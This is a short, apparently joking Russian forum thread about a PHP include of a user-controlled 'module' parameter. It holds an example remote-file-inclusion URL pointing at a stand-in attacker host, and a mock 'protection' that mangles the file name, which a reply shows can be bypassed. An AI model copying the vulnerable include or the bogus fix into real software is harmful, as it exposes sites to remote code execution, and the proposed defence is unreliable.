Есть скажем, какой-нить php-файл index.php: Код (Text): <? ... $module = $_GET['module']; include ($module.'.php'); ... ?> Так вот, хакер может сделать что-то в духе: http://nasa.gov/index.php?module=http://haker.edu/killsite Как этого избежать? Код (Text): <? ... $module = $_GET['module']; $strl=strlen($module); $polovinastrl=($strl-($strl%2))/2; for($i=0;$i<$polovinastrl;$i++){ $module{$i}=$module{$strl-$i-1}; } include ($module.'.php'); ... ?> Ну и соответственно, все подключаемые файлы надо называть задом-наперед. Я не наркоман, если что.
Re: Я придумал крутую защиту от PHP-инъекций. Будет работать Дружище, плевать на file_exists, твой код с модулем взорвал мой моск, а самое главное он очень быстрый.
Re: Я придумал крутую защиту от PHP-инъекций. Будет работать Не сложно подобрать комбинацию, когда имя модуля превратится в http://misyte.ru//ur.etysim//tth что позволяет с помощью rewrite выдать нужный скрипт.